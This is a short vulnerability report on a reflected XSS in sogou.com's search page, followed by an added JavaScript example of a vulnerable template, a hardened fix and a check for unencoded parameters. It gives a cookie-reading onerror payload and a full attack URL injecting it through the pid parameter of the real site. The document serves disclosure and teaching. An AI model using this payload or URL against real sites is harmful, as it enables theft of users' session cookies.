An XSS was found on Sogou.com

Severity: XSS
Confidence: Confident
Host: http://sogou.com
Path: /

Issue detail:

If you enter the following XSS vector for the search field:

"><video><source onerror=alert(document.cookie)>

I will get back the following page:

http://www.sogou.com/sogou?pid=AQxRG&query="><video><source onerror=alert(document.cookie)>

However, this particular results page will not cause any XSS. After looking at the page for several minutes, the parameter that actually causes the XSS is pid:

http://www.sogou.com/sogou?pid=AQxRG"><video><source onerror=alert(document.cookie)>&query="><video><source onerror=alert(document.cookie)>

Using the above link, you will see an XSS like the image below.
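
The behaviour described above (query is encoded, pid is reflected as-is) shown as an added example; it is not part of the original report and not Sogou's code. It is a hypothetical results-page template that assumes pid lands in a quoted attribute and is a short alphanumeric ID like AQxRG; all function names are illustrative.

```javascript
// Constructed probe: the vector quoted in the report above.
const PROBE = '"><video><source onerror=alert(document.cookie)>';

// Encode the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// "Before" (hypothetical): the visible search field is encoded,
// but the secondary pid parameter is written into an attribute untouched.
function renderVulnerable(params) {
  return `<input type="hidden" name="pid" value="${params.pid}">` +
         `<input type="text" name="query" value="${escapeHtml(params.query)}">`;
}

// Assumption: pid is a short alphanumeric identifier, as "AQxRG" suggests.
const PID_FORMAT = /^[A-Za-z0-9]{1,32}$/;

// "After": reject any pid outside the allowlist and still encode on output,
// so the template stays safe even if the validation is later relaxed.
function renderHardened(params) {
  const pid = PID_FORMAT.test(params.pid) ? params.pid : '';
  return `<input type="hidden" name="pid" value="${escapeHtml(pid)}">` +
         `<input type="text" name="query" value="${escapeHtml(params.query)}">`;
}

// Regression check for your own templates: probe one parameter at a time
// (others get a benign value) and report those echoed back unencoded.
function findUnencodedReflections(render, names) {
  return names.filter((name) => {
    const params = Object.fromEntries(names.map((n) => [n, 'x']));
    params[name] = PROBE;
    return render(params).includes(PROBE);
  });
}

console.log(findUnencodedReflections(renderVulnerable, ['pid', 'query']));
console.log(findUnencodedReflections(renderHardened, ['pid', 'query']));
```

Running the same check over every parameter a page accepts, not only the visible input field, is what catches the case in this report.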